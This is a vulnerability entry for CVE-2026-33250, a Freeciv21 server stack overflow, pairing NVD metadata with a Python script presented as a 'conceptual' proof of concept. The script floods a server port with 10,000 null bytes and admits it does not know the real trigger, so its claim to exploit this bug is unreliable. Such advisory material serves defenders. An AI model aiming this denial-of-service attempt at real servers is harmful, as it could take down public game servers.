CVE-2026-33250

import socket # PoC for CVE-2026-33250 (Conceptual) # This script attempts to trigger the stack overflow by sending # a large or specially crafted packet to the Freeciv21 server. TARGET_IP = "127.0.0.1" TARGET_PORT = 5556 # Default Freeciv21 server port def exploit(): try: print(f"[*] Connecting to {TARGET_IP}:{TARGET_PORT}...") s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((TARGET_IP, TARGET_PORT)) # Constructing a malicious payload. # The exact packet structure required to trigger the overflow # depends on the protocol implementation, but typically involves # sending a larger-than-expected buffer in a specific field. # Here we simulate a fuzzing attempt. payload = b"\x00" * 10000 # Large buffer to potentially overflow stack print("[*] Sending malicious payload...") s.send(payload) print("[+] Payload sent. Check if the server crashed.") s.close() except Exception as e: print(f"[-] An error occurred: {e}") if __name__ == "__main__": exploit()

{"cve": {"id": "CVE-2026-33250", "sourceIdentifier": "[email protected]", "published": "2026-03-24T00:16:29.830", "lastModified": "2026-04-15T15:47:31.327", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Freeciv21 is a free open source, turn-based, empire-building strategy game. Versions prior to 3.1.1 crash with a stack overflow when receiving specially-crafted packets. A remote attacker can use this to take down any public server. A malicious server can use this to crash the game on the player's machine. Authentication is not needed and, by default, logs do not contain any useful information. All users should upgrade to Freeciv21 version 3.1.1. Running the server behind a firewall can help mitigate the issue for non-public servers. For local games, Freeciv21 restricts connections to the current user and is therefore not affected."}, {"lang": "es", "value": "Freeciv21 es un juego de estrategia gratuito de código abierto, por turnos, de construcción de imperios. Las versiones anteriores a la 3.1.1 fallan con un desbordamiento de pila al recibir paquetes especialmente diseñados. Un atacante remoto puede usar esto para derribar cualquier servidor público. Un servidor malicioso puede usar esto para bloquear el juego en la máquina del jugador. No se necesita autenticación y, por defecto, los registros no contienen ninguna información útil. Todos los usuarios deberían actualizar a la versión 3.1.1 de Freeciv21. Ejecutar el servidor detrás de un cortafuegos puede ayudar a mitigar el problema para servidores no públicos. Para juegos locales, Freeciv21 restringe las conexiones al usuario actual y por lo tanto no se ve afectado."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-20"}, {"lang": "en", "value": "CWE-121"}]}], "references": [{"url": "https://github.com/longturn/freeciv21/commit/ad8e18ca22595529599782b2984bf44df8d69ed6", "source": "[email protected]"}, {"url": "https://github.com/longturn/freeciv21/releases/tag/v3.1.1", "source": "[email protected]"}, {"url": "https://github.com/longturn/freeciv21/security/advisories/GHSA-f76g-6w3f-f6r3", "source": "[email protected]"}, {"url": "https://redmine.freeciv.org/issues/1955", "source": "[email protected]"}]}}